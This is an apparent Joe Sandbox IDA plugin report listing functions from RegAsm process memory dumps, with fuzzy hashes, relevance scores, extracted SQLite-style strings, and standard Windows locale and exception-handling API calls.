Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: e
API String ID: 0-4024072794
Opcode ID: 36bf8875baaf085edaede92fcfbfd96a80b42455c8294c9340591cc07f665f1e
Instruction ID: 2a986f409c3eb44211b030ec88bd9418ee8373c9b14a57333a0d74cbd67b1ea8
Opcode Fuzzy Hash: 36bf8875baaf085edaede92fcfbfd96a80b42455c8294c9340591cc07f665f1e
Instruction Fuzzy Hash: 095124767082419FE704CE29EC84A67B7E5FFC5211F18456AF8C6C6191EB31E854C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 19C9DFC0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 131COMMON

Download Yara Rule

Strings

%lld %lld, xrefs: 19C9E055

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %lld %lld
API String ID: 0-3794783949
Opcode ID: 9997feb96585a8199ec682fe41ff3052957d3aaafecdc7e9afb6276daeb3a99b
Instruction ID: b1088e4466d3540f946d9fe43ff285956f273a3e94a114dafcf00477b2b599bc
Opcode Fuzzy Hash: 9997feb96585a8199ec682fe41ff3052957d3aaafecdc7e9afb6276daeb3a99b
Instruction Fuzzy Hash: AE31287A6042007FE7115B28EC45F6B77BEEFC0710F489818F6C193291EB72E9118BA2

Uniqueness

Uniqueness Score: -1.00%

Function 19D414D0 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 360COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19D415B1
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19D415A2
API called with finalized prepared statement, xrefs: 19D41586
misuse, xrefs: 19D415AC
API called with NULL prepared statement, xrefs: 19D41571

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: d6c3c557382a12e04b366a6a4d0c9df9691ff2ec5ac7b3f8d90827665a975604
Instruction ID: 992d53fa78439d0e5f0ca3bcd9250372e3c5f3f9edc1c8e4a7c652b746b7669a
Opcode Fuzzy Hash: d6c3c557382a12e04b366a6a4d0c9df9691ff2ec5ac7b3f8d90827665a975604
Instruction Fuzzy Hash: 7FC1E3B4B007419BE7208F34DC4575777E8BF60354F2C4528E89A9BE82E775E458CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 19D4D4F0 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 310COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19D4D5EC
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19D4D5DD
API called with finalized prepared statement, xrefs: 19D4D5C1
misuse, xrefs: 19D4D5E7
API called with NULL prepared statement, xrefs: 19D4D5AC

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: f6fca94b1be47fa6c1105bc815323bd69b52e34f3aaca7e96b816418505906df
Instruction ID: 1a5a937a0650f88a403653392be5c9a191907347334ae62de84ba5e34f7b8d31
Opcode Fuzzy Hash: f6fca94b1be47fa6c1105bc815323bd69b52e34f3aaca7e96b816418505906df
Instruction Fuzzy Hash: 82B1E1B89047419FE7118F24D884B5777E4BF45308F28892CE89A8BF81E775F459CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 19D04D40 Relevance: 14.0, APIs: 9, Instructions: 476COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0134857be53abcbf9c08c8efcf856cf259cfe62961e04b2fecfdd39129408a4
Instruction ID: 7a4b35b01251a6823f7e68136ff11bba67ea8b696e4b75fc81e7646c2826627e
Opcode Fuzzy Hash: e0134857be53abcbf9c08c8efcf856cf259cfe62961e04b2fecfdd39129408a4
Instruction Fuzzy Hash: FDF1F2B09003429FD711AF75DC98A2B7BF8EF85314F4C452CED4882681EB71E955CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 19CD5940 Relevance: 12.4, APIs: 8, Instructions: 391COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23faaff120bf156c6f94e1b9fee908ab2f8534ecf493d16e1c9ad08443913d20
Instruction ID: a6e0dfdc258ce04c5f8bedccc09a0efce32e812e4c45a240b66fe28b70e80fe6
Opcode Fuzzy Hash: 23faaff120bf156c6f94e1b9fee908ab2f8534ecf493d16e1c9ad08443913d20
Instruction Fuzzy Hash: 1DC16677E183814FF7009A18EC82B9B77D1EBE6310F8C052EE6D9872D6E225A545C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 19CC51D0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 141COMMON

Download Yara Rule

Strings

, xrefs: 19CC5334
REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 19CC5264

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: $REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
API String ID: 0-69911113
Opcode ID: 10a973ee1bfc568f4db60d6c3d2b3124b71c467cf46daedeecd551615146cf64
Instruction ID: db47486df9bdbd89d9dc14d6a911008786190362d157c1a6ca3e7866ac20ccb1
Opcode Fuzzy Hash: 10a973ee1bfc568f4db60d6c3d2b3124b71c467cf46daedeecd551615146cf64
Instruction Fuzzy Hash: FE41A276A04241EFD700DF29EC80B5AB7E9FF88304F494528F984A7251D772E951CB92

Uniqueness

Uniqueness Score: -1.00%

Function 19CFD610 Relevance: 10.6, APIs: 7, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fd5a444f62547b55e1c478906cffc6cc5e8d8fd97acf4dcf33dab7dbce9423b
Instruction ID: 61e2938fd25af45d74e383b2d94225fbe272719cbe3ba40c94e14105ec08638b
Opcode Fuzzy Hash: 8fd5a444f62547b55e1c478906cffc6cc5e8d8fd97acf4dcf33dab7dbce9423b
Instruction Fuzzy Hash: 0741D575500B029FD7019F25EC80A5BB7F8FF85310F08492CF9A886250EB71F915CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 19C34820 Relevance: 9.3, APIs: 6, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d07f2aa2eaafd888c3073a7fff9201bc5f51748b0bb5ad3ee9a64e2d3ae5ca0
Instruction ID: b060789f17c861381116b59b09991bf72878195151d7745d1abd16cc5acb96ff
Opcode Fuzzy Hash: 2d07f2aa2eaafd888c3073a7fff9201bc5f51748b0bb5ad3ee9a64e2d3ae5ca0
Instruction Fuzzy Hash: B8B1B0B5804742AFD300CF26D884B1BF7F8BF89709F489A19F59896280E775E654CF92

Uniqueness

Uniqueness Score: -1.00%

Function 19C35C70 Relevance: 9.1, APIs: 6, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
Instruction ID: d03a6c69baf750a11a079fddd1d8c230762de47b3411341e05417af8ca2210f6
Opcode Fuzzy Hash: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
Instruction Fuzzy Hash: 4D4148BA2043819FEB04DF14E880E66B7F0FF98312F584469E8C587691DB31FA40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 19CB9090 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3e53c60217140939e25b2031cdacaac65d3e65f9f1898a56aec0e2d2609fc1c
Instruction ID: a850297240fa0076738e76ecc133f757d6082365e1441fec5c70aeb2a3736bc0
Opcode Fuzzy Hash: c3e53c60217140939e25b2031cdacaac65d3e65f9f1898a56aec0e2d2609fc1c
Instruction Fuzzy Hash: B831D3396002009FD314CF28E8C5AA6B3E5FF84369B4945B9E9838F262DB22FC51DB50

Uniqueness

Uniqueness Score: -1.00%

Function 19CA1FE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 19CA2001

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
API String ID: 0-914542581
Opcode ID: feb4b4e2829851bfab2dbcf6440891c3ad1341fd79c5408eb82ac1d0fd48a102
Instruction ID: b6f4b5d862aec7ab6e160cb2b0848605d7c6a8dcb4b3f04ce88ad18113e482fa
Opcode Fuzzy Hash: feb4b4e2829851bfab2dbcf6440891c3ad1341fd79c5408eb82ac1d0fd48a102
Instruction Fuzzy Hash: B321D076500226AFDB11AF68EC80F577BAEEF04354F888418F484A7191E772F860CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 19E13300 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,19E13688,?,00000000), ref: 19E13399
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,19E13688,?,00000000), ref: 19E133C2
GetACP.KERNEL32(?,?,19E13688,?,00000000), ref: 19E133D7

Strings

OCP, xrefs: 19E13354
ACP, xrefs: 19E1331E

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 837dff6351d00f5c25abd089f830704d953a0e83811dbaae2656b501b09dee1b
Instruction ID: 1353cfe72e477c63f59a3c99eee544b91dac5fd5e4305e585f76461961d60fe2
Opcode Fuzzy Hash: 837dff6351d00f5c25abd089f830704d953a0e83811dbaae2656b501b09dee1b
Instruction Fuzzy Hash: 52210A72B00143A7D7258F15C906A8B73A6BF40F59B8E5474E92ADF186EF32DD40C358

Uniqueness

Uniqueness Score: -1.00%

Function 19C23AA3 Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

GetUserDefaultLCID.KERNEL32 ref: 19E1365A
IsValidCodePage.KERNEL32(00000000), ref: 19E13698
IsValidLocale.KERNEL32(?,00000001), ref: 19E136AB
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040), ref: 19E136F3
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 19E1370E

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID: Locale$InfoValid$CodeDefaultPageUser
String ID:
API String ID: 3475089800-0
Opcode ID: 1879088d235d3bca0d22eaf74d7b16dd65c010159fd461dc0f5d690d5c9ba954
Instruction ID: a5ae287bc52311650cc3bea3f79f1f55a624bf4f6c6a5b7eced89bd666d23114
Opcode Fuzzy Hash: 1879088d235d3bca0d22eaf74d7b16dd65c010159fd461dc0f5d690d5c9ba954
Instruction Fuzzy Hash: B65190B5A00205AFEF15DFA5DC84AAFB3B8AF04744F595439E515EF280EB70EA00CB60

Uniqueness

Uniqueness Score: -1.00%

Function 19C8E090 Relevance: 6.1, APIs: 4, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7326288b7d2e402589f81706667a94cc86c933e2798d45c2a405c67956cab320
Instruction ID: ec41dfac5bb477ab727cd05e890303e423070b31d426157b2fb248b5aad12a88
Opcode Fuzzy Hash: 7326288b7d2e402589f81706667a94cc86c933e2798d45c2a405c67956cab320
Instruction Fuzzy Hash: 0231F376610200AFD714DF04EC41A76B7E5EB85314F09859EF8858F292D736F896CB91

Uniqueness

Uniqueness Score: -1.00%

Function 19C22C8E Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 19DC48A7
IsDebuggerPresent.KERNEL32 ref: 19DC4973
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 19DC4993
UnhandledExceptionFilter.KERNEL32(?), ref: 19DC499D

Memory Dump Source

